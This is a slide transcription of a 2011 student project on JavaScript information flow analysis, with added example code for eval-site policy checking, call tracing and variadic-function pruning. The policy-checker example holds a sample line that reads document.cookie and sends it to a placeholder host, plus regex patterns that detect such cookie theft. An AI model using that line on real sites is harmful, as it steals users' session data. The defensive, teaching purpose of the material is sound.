Post on 01-Apr-2018
Fall 2011 ‐ Privacy & Security ‐ Virginia Tech – Computer Science
JavaScript Information Flow Analysis
Shiyi Wei, CS 6204 term project
Overview
• Project motivation
• Literature review
  – Paper organization
  – Selected papers
  – Observations
• Framework overview
• Analysis components
• On-going work & conclusion
Project Motivation
Jif: Java information flow
• Type-based approach
  – Language extension
  – Imprecise
• Java programming language
  – Static typing
  – Class hierarchy
Project Motivation
Information flow analysis for JavaScript: does the type-based approach still work?
• Dynamic typing
Challenges
• Dynamic language features
  – Prototyping
  – Dynamic code generation
  – Variadic functions
  – Fields
• Benchmark
Literature Review
Paper categories
• Information flow analysis for C, C++, and Java
• Analyzing dynamic languages
  – Performance
  – Correctness
• Security analysis of JavaScript
  – Static analysis
  – Dynamic analysis
Literature Review
GATEKEEPER [1]
JavaScript widget → JavaScript_SAFE (static) / JavaScript_GK (dynamic)
• Static
• Dynamic
References
[1] S. Guarnieri and B. Livshits. GATEKEEPER: mostly static enforcement of security and reliability policies for JavaScript code. In Proceedings of the 18th USENIX Security Symposium (2009), pp. 151–168.
Literature Review
Staged information flow for JavaScript [2]
Integrity policy
• The code loaded at any eval site must not flow into the value of document.location
Confidentiality policy
• The value of document.cookie must not flow into any variable within the code loaded at any eval site
Staged information flow
• Stage 1: Compute policy
• Stage 2: Check policy
References
[2] R. Chugh, J. A. Meister, R. Jhala, and S. Lerner. Staged information flow for JavaScript. In Proceedings of the 2009 ACM SIGPLAN Conference on Programming Language Design and Implementation.
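The two stages described on this slide, as an added example that is not code from the slides or from the Chugh et al. paper: Stage 1 scans the static page source for eval sites and attaches a residual policy to each; Stage 2 checks the code that actually arrives at a site against that policy. The check is a syntactic, regular-expression approximation of the real flow analysis, so it over-approximates (any syntactic access to a guarded property is reported). The page source, the loaded code strings and the function names are all constructed here and are not taken from any real site.

```javascript
// Added example, not code from the slides or the cited paper: a simplified
// two-stage policy check for code loaded at eval sites. Syntactic and
// conservative: a syntactic access to a guarded property is reported whether
// or not a real information flow exists.

// Residual policy: what dynamically loaded code must not do.
const RESIDUAL_POLICY = {
  // Integrity: loaded code must not write document.location.
  integrity: [
    /document\s*\.\s*location(\s*\.\s*\w+)?\s*=[^=]/,        // document.location = ..., document.location.href = ...
    /document\s*\[\s*['"]location['"]\s*\]\s*=[^=]/,         // document["location"] = ...
    /document\s*\.\s*location\s*\.\s*(assign|replace)\s*\(/, // document.location.assign(...)
  ],
  // Confidentiality: loaded code must not read document.cookie.
  confidentiality: [
    /document\s*\.\s*cookie\b/,
    /document\s*\[\s*['"]cookie['"]\s*\]/,
  ],
};

// Stage 1: locate eval sites (eval, window.eval, new Function) in the static
// page source and attach the residual policy to each of them.
function computePolicy(pageSource) {
  const sites = [];
  pageSource.split('\n').forEach((text, i) => {
    const re = /\b(?:window\s*\.\s*)?eval\s*\(|\bnew\s+Function\s*\(/g;
    while (re.exec(text) !== null) {
      sites.push({ site: sites.length, line: i + 1, policy: RESIDUAL_POLICY });
    }
  });
  return sites;
}

// Stage 2: check one piece of dynamically loaded code against the residual
// policy of the eval site it is about to be loaded at. Returns the list of
// violations; an empty list means the code may be loaded.
function checkPolicy(site, loadedCode) {
  const violations = [];
  for (const [kind, patterns] of Object.entries(site.policy)) {
    const hit = patterns.find((p) => p.test(loadedCode));
    if (hit) violations.push({ kind, site: site.site, line: site.line, pattern: String(hit) });
  }
  return violations;
}

// Both stages together: loadedBySite maps an eval-site index to the code
// that arrived at that site at runtime.
function stagedCheck(pageSource, loadedBySite) {
  return computePolicy(pageSource)
    .flatMap((s) => checkPolicy(s, loadedBySite[s.site] || ''));
}

// Constructed sample page and loaded code (hypothetical, not from a real site).
const PAGE_SOURCE = [
  "var widget = fetchWidget();",
  "eval(widget);                            // eval site 0",
  "var h = new Function('x', 'return x');   // eval site 1",
].join('\n');

const LOADED_OK  = "var t = document.title; render(t);";
const LOADED_BAD = "var c = document.cookie; document.location = 'https://example.invalid/?' + c;";

// Runs the sample: site 0 receives benign code, site 1 receives code that
// violates both policies, so two violations are returned, both for site 1.
function demo() {
  return stagedCheck(PAGE_SOURCE, { 0: LOADED_OK, 1: LOADED_BAD });
}
```

The residual policy is the same for every site here; in the paper's setting Stage 1 would compute a per-site policy from the flows already present in the static code, which is the part this syntactic stand-in does not attempt.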
Literature Review
JavaScript taint analysis [3]
• Prototypes
• Object creations
• Reflective property accesses
• Lexical scoping
References
[3] S. Guarnieri, M. Pistoia, O. Tripp, J. Dolby, S. Teilhet, and R. Berg. Saving the world wide web from vulnerable JavaScript. In Proceedings of the 2011 International Symposium on Software Testing and Analysis.
Literature Review
Observations
Handle limited language features
• Prototype [2,4]
• Property deletion
• eval
Experimental design
• JavaScript benchmark not representative [5]
References
[4] A. Guha, S. Krishnamurthi, and T. Jim. Using static analysis for Ajax intrusion detection. In International Conference on World Wide Web (WWW), 2009.
[5] G. Richards, S. Lebresne, B. Burg, and J. Vitek. An analysis of the dynamic behavior of JavaScript programs. In Proceedings of the 2010 ACM SIGPLAN Conference on Programming Language Design and Implementation.
Framework Overview
• Instrumented WebKit → call graph + dynamically generated code → static analysis infrastructure
• Website source → static analysis infrastructure
Analysis Components
Instrumented WebKit
Tracing Safari [5]
Instrumented code
• Function calls
  – Method signature
  – Arguments
• Object creation sites
• Dynamically generated code
  – eval
  – document.write
  – etc.
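The three kinds of events the instrumented browser records (function calls with signature and arguments, object creation sites, dynamically generated code), reproduced in plain JavaScript as an added example. This is not the project's WebKit instrumentation: it wraps functions, constructors, eval and Function in user code instead of patching the engine, and the sample program, the tracer API (makeTracer, traceFunction, traceConstructor, tracedEval, tracedFunction) and the trace format are all assumptions made here. The output is the kind of dynamic call graph and generated-code record that a static analysis could import.

```javascript
// Added example, not the project's WebKit instrumentation: record call edges,
// allocations and dynamically generated code by wrapping user-level functions.

function makeTracer() {
  const trace = { calls: [], objects: [], generated: [] };
  const stack = ['<top>'];   // names of the traced functions currently executing
  const current = () => stack[stack.length - 1];

  // Recover parameter names from the function text (good enough for ordinary
  // function declarations and class constructors).
  function paramNames(fn) {
    const m = /^[^(]*\(([^)]*)\)/.exec(fn.toString());
    return m ? m[1].split(',').map((s) => s.trim()).filter(Boolean) : [];
  }

  // Function calls: record a call-graph edge (caller -> callee), the callee's
  // signature and the actual arguments, then run the original function.
  function traceFunction(name, fn) {
    const signature = `${name}(${paramNames(fn).join(', ')})`;
    return function traced(...args) {
      trace.calls.push({ caller: current(), callee: name, signature, args: args.slice() });
      stack.push(name);
      try { return fn.apply(this, args); } finally { stack.pop(); }
    };
  }

  // Object creation sites: record which traced function allocated which type.
  function traceConstructor(name, Ctor) {
    return function tracedCtor(...args) {
      trace.objects.push({ site: current(), type: name, args: args.slice() });
      return new Ctor(...args);   // returning an object from a constructor overrides `this`
    };
  }

  // Dynamically generated code: tracing stand-ins for eval and Function.
  // tracedEval is an indirect eval, so the generated code runs in global scope.
  function tracedEval(src) {
    trace.generated.push({ site: current(), mechanism: 'eval', source: src });
    return (0, eval)(src);
  }
  function tracedFunction(...fnArgs) {
    trace.generated.push({ site: current(), mechanism: 'Function', source: fnArgs[fnArgs.length - 1] });
    return Function(...fnArgs);
  }

  return { trace, traceFunction, traceConstructor, tracedEval, tracedFunction };
}

// Constructed sample program (hypothetical, not a real site) run under the tracer.
function runSample() {
  const t = makeTracer();
  class Point { constructor(x, y) { this.x = x; this.y = y; } }
  const TracedPoint = t.traceConstructor('Point', Point);
  const add = t.traceFunction('add', function add(a, b) { return a + b; });
  const main = t.traceFunction('main', function main(n) {
    const p = new TracedPoint(n, add(n, 1));            // call edge main -> add, then an allocation at site "main"
    const sq = t.tracedFunction('v', 'return v * v');   // generated code recorded at site "main"
    return sq(p.y) + t.tracedEval('1 + 1');             // generated code recorded at site "main"
  });
  return { result: main(3), trace: t.trace };   // result: 4 * 4 + 2 = 18
}
```

Because tracedEval is an indirect eval it cannot see the caller's local variables, which is one reason engine-level instrumentation (as in the project) records more than a user-level wrapper can.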
Analysis Components
Static infrastructure
WALA
• IBM T.J. Watson Libraries for Analysis
Extract JavaScript code
• From website source
Import dynamic information
• Dynamic call graph
• Dynamically generated code
Analysis Components
Static infrastructure
Handle JavaScript language features
• Variadic functions
  – Method definitions + arguments
  – Pruning with arguments.length
  – twitter.com, amazon.com, msn.com, …
• Dynamic code generation

Example: a variadic function that dispatches on arguments.length (the slide's comparisons written as `==`; the elided branch bodies are left as comments)

    function F(a, b)
    {
      if (arguments.length == 1)
      { /* one-argument case */ }
      else if (arguments.length == 2)
      { /* two-argument case */ }
      else if (arguments.length >= 3)
      { /* three-or-more-argument case */ }
    }
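Pruning with arguments.length, as an added example that is not the project's WALA-based implementation: the guards of a variadic function are recovered from its source text and each one is evaluated against the argument counts observed at the call sites, so branches no call site can reach are marked dead. The guard extraction is a regular expression rather than a parser, the if/else-if ordering is deliberately not modelled (a guard is evaluated on its own, which can only keep more branches alive, never prune a live one), and the function source and call-site arities are constructed here.

```javascript
// Added example, not the project's implementation: prune the branches of a
// variadic function by the argument counts seen at its call sites.

// Matches "arguments.length <op> N" with any of the JavaScript comparison operators.
const GUARD_RE = /arguments\s*\.\s*length\s*(===|!==|==|!=|<=|>=|<|>)\s*(\d+)/g;

// Collect every arguments.length guard in order of appearance.
function extractGuards(fnSource) {
  const guards = [];
  let m;
  GUARD_RE.lastIndex = 0;
  while ((m = GUARD_RE.exec(fnSource)) !== null) {
    guards.push({ index: guards.length, op: m[1], bound: Number(m[2]), text: m[0] });
  }
  return guards;
}

// Evaluate one guard for a concrete argument count.
function guardHolds(guard, argc) {
  switch (guard.op) {
    case '===': case '==': return argc === guard.bound;
    case '!==': case '!=': return argc !== guard.bound;
    case '<':  return argc < guard.bound;
    case '<=': return argc <= guard.bound;
    case '>':  return argc > guard.bound;
    case '>=': return argc >= guard.bound;
    default:   return true;   // unknown operator: keep the branch (conservative)
  }
}

// Given the argument counts observed at all call sites, split the guards into
// those that can hold for at least one call site (live) and those that can
// never hold (dead). Each guard is judged on its own: the else-if chain is not
// modelled, so the result over-approximates liveness and is safe for pruning.
function pruneGuards(fnSource, callSiteArities) {
  const guards = extractGuards(fnSource);
  const live = guards.filter((g) => callSiteArities.some((argc) => guardHolds(g, argc)));
  const dead = guards.filter((g) => !live.includes(g));
  return { live, dead };
}

// Constructed sample: the slide's function F (declared with two parameters,
// but its branches accept one, two, or three or more arguments) and the
// arities of two hypothetical call sites, F(x) and F(x, y).
const F_SOURCE = `
function F(a, b) {
  if (arguments.length == 1) { /* one-argument case */ }
  else if (arguments.length == 2) { /* two-argument case */ }
  else if (arguments.length >= 3) { /* three-or-more-argument case */ }
}`;
const CALL_SITE_ARITIES = [1, 2];

// With only one- and two-argument call sites, the ">= 3" branch is dead.
function demo() {
  return pruneGuards(F_SOURCE, CALL_SITE_ARITIES);
}
```

The same routine applies to any function whose source and call-site arities are known; when a call site's arity is unknown (spread arguments, Function.prototype.apply with a computed array), the safe choice is to treat every guard as live for that site.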
On-going Work & Conclusion
On-going work
• Information flow algorithm
• Benchmark
• Handle other language features
  – Prototyping, etc.
Conclusion
• Literature review
  – JavaScript information flow is hard
  – Dynamic language features
• Blended approach
  – Works on unsolved issues